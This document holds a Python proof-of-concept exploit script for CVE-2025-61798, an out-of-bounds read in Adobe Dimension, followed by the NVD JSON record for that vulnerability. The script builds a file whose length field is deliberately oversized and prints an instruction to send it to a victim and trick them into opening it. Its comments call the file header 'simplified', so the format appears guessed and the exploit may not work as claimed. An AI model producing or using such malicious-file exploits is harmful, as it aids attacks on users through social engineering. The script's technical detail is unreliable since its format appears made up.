CVE-2025-61798

# CVE-2025-61798 PoC - Adobe Dimension Out-of-Bounds Read # This PoC demonstrates the concept of exploiting an OOB read vulnerability # in Adobe Dimension through a crafted file. import struct import os def generate_malicious_dimension_file(output_path): """ Generate a crafted file that triggers an out-of-bounds read in Adobe Dimension version <= 4.1.4. The vulnerability occurs when parsing certain file structures where length/offset fields are not properly validated. """ # Adobe Dimension project file header (simplified) header = b'DIMN' # Magic bytes version = struct.pack('<I', 0x04010400) # Version 4.1.4 # Crafted metadata block with malicious length field # The length field is set to a value larger than the actual buffer block_type = struct.pack('<H', 0x0001) # Geometry block claimed_length = struct.pack('<I', 0xFFFFFFF0) # Exaggerated length to trigger OOB read actual_data = b'\x00' * 64 # Small actual data # Build the malicious file payload = header + version + block_type + claimed_length + actual_data with open(output_path, 'wb') as f: f.write(payload) print(f"[+] Malicious file generated: {output_path}") print(f"[!] Send this file to victim and trick them to open it with Adobe Dimension") if __name__ == '__main__': output = 'exploit.dimn' generate_malicious_dimension_file(output) print("[*] PoC ready. Victim must open this file to trigger the vulnerability.")

{"cve": {"id": "CVE-2025-61798", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:51.870", "lastModified": "2025-10-16T17:38:44.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dimension versions 4.1.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:dimension:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.5", "matchCriteriaId": "03D05CE7-FF6A-4914-850B-10D66BB93E29"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/dimension/apsb25-103.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}